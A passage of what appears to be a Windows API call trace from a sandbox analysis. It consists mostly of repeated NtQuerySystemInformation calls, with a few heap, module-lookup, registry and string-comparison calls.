ResultLength=0x0) [0241.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.328] GetProcessHeap () returned 0x2026c630000 [0242.328] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d8064e0 [0242.328] GetProcessHeap () returned 0x2026c630000 [0242.328] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d7750 [0242.328] GetProcessHeap () returned 0x2026c630000 [0242.328] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d314fc0 | out: hHeap=0x2026c630000) returned 1 [0242.328] GetProcessHeap () returned 0x2026c630000 [0242.328] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x17c) returned 0x2026d1d47e0 [0242.329] GetProcessHeap () returned 0x2026c630000 [0242.329] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xdc) returned 0x2026c63df70 [0242.329] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xc751f7f3e0 | out: phModule=0xc751f7f3e0*=0x7ffcea380000) returned 1 [0242.329] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0242.362] RegQueryInfoKeyW (hKey=0x33c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xc751f7f57c, lpcbMaxValueNameLen=0xc751f7f574, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) [0242.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f580, Length=0x50, ResultLength=0x0) [0242.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f500, Length=0x28, ResultLength=0x0) [0242.903] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0242.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f580, Length=0x50, ResultLength=0x0) [0242.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f580, Length=0x50, ResultLength=0x0) [0242.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f580, Length=0x50, ResultLength=0x0) [0242.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4b0, Length=0x38, ResultLength=0x0) [0242.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2e0, Length=0x28, ResultLength=0x0) [0242.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2e0, Length=0x28, ResultLength=0x0) [0242.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2e0, Length=0x28, ResultLength=0x0) [0242.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f350, Length=0x28, ResultLength=0x0) [0242.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4b0, Length=0x38, ResultLength=0x0) [0242.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3d0, Length=0x28, ResultLength=0x0) [0242.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3d0, Length=0x28, ResultLength=0x0) [0242.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4b0, Length=0x38, ResultLength=0x0) [0242.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f330, Length=0x20, ResultLength=0x0) [0242.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2b0, Length=0x20, ResultLength=0x0) [0242.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2b0, Length=0x20, ResultLength=0x0) [0242.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2b0, Length=0x20, ResultLength=0x0) [0242.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4b0, Length=0x38, ResultLength=0x0) [0242.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f330, Length=0x20, ResultLength=0x0) [0242.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2c0, Length=0x20, ResultLength=0x0) [0242.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2c0, Length=0x20, ResultLength=0x0) [0242.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f580, Length=0x50, ResultLength=0x0) [0242.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f500, Length=0x28, ResultLength=0x0) [0242.910] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0242.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f580, Length=0x50, ResultLength=0x0) [0242.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f580, Length=0x50, ResultLength=0x0) [0242.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f580, Length=0x50, ResultLength=0x0) [0242.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0242.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4b0, Length=0x38, ResultLength=0x0) [0243.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2e0, Length=0x28, ResultLength=0x0) [0243.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2e0, Length=0x28, ResultLength=0x0) [0243.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2e0, Length=0x28, ResultLength=0x0) [0243.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f350, Length=0x28, ResultLength=0x0) [0243.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4b0, Length=0x38, ResultLength=0x0) [0243.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3d0, Length=0x28, ResultLength=0x0) [0243.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3d0, Length=0x28, ResultLength=0x0) [0243.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4b0, Length=0x38, ResultLength=0x0) [0243.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f330, Length=0x20, ResultLength=0x0) [0243.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2b0, Length=0x20, ResultLength=0x0) [0243.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2b0, Length=0x20, ResultLength=0x0) [0243.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2b0, Length=0x20, ResultLength=0x0) [0243.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4b0, Length=0x38, ResultLength=0x0) [0243.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f330, Length=0x20, ResultLength=0x0) [0243.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2c0, Length=0x20, ResultLength=0x0) [0243.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 